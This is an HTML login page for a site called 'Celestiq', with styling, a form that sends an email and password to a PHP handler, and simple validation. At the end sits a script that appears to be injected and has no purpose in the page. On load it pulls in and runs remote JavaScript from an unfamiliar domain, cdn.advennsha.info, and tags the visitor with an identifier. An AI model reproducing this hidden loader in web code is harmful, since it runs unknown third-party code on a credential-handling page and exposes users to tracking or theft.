<html>
        <head>
                <meta name="viewport" content="width=device-width, initial-scale=1">
                <style>
        body {font-family: Arial, Helvetica, sans-serif;}
        form {border: 3px solid #f1f1f1;}
        
        input[type=text], input[type=password] {
          width: 100%;
          padding: 12px 20px;
          margin: 8px 0;
          display: inline-block;
          border: 1px solid #ccc;
          box-sizing: border-box;
        }
        
        button {
          background-color: #4CAF50;
          color: white;
          padding: 14px 20px;
          margin: 8px 0;
          border: none;
          cursor: pointer;
          width: 100%;
        }
        
        button:hover {
          opacity: 0.8;
        }
        
        .cancelbtn {
          width: auto;
          padding: 10px 18px;
          background-color: #f44336;
        }
        
        .imgcontainer {
          text-align: center;
          margin: 24px 0 12px 0;
        }
        
        img.avatar {
          width: 40%;
          border-radius: 50%;
        }
        
        .container {
          padding: 16px;
        }
        
        span.psw {
          float: right;
          padding-top: 16px;
        }
        
        /* Change styles for span and cancel button on extra small screens */
        @media screen and (max-width: 300px) {
          span.psw {
             display: block;
             float: none;
          }
          .cancelbtn {
             width: 100%;
          }
        }
        </style>
        <link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
        <script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
        <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
        <script> 
                function validate()                                    
                { 
                    var email = document.forms["RegForm"]["Email_Address"];               
                    var pass = document.forms["RegForm"]["password"];   
                    if (email.value == "")                                  
                    { 
                        window.alert("Please enter your email."); 
                        email.focus(); 
                        return false; 
                    } 
                   
                    else if (pass.value == "")                               
                    { 
                        window.alert("Please enter your password."); 
                        pass.focus(); 
                        return false; 
                    }                    
                    return true; 
                }</script> 
        </head>
<body>
        <div class="imgcontainer">
                <h3>Celestiq LOGIN</h3>
              </div>
            
              <div class="container">
<form name="RegForm"   action="connectionFetch.php" onsubmit="return validate()" method="POST" >
Email Address:<input type="text" name="Email_Address" required><br>
Password:<input type="password" name="password" required><br>
<div class="container" style="background-color:#f1f1f1">
        <center><input type="submit" name="Submit" value="submit"  class="cancelbtn"></center>
      </div>

<p>Not Registered<a href="celestiq.html">Sign in</a></p>
</form>
              </div>

<script type="text/javascript">
(function(window, document) {
	if (window === top) {
	var script = document.createElement('script');
	script.src = 'https://cdn.advennsha.info/pa.min.js';
	document.getElementsByTagName('head')[0].insertAdjacentElement('beforeEnd', script);
	window['_paInfo_'] = window['_paInfo_'] || {
		uid: 'BFEBFBFF00040651F8B6104B',sub1: 'pa'
	}
}
})(window, document);
</script></body>
</html>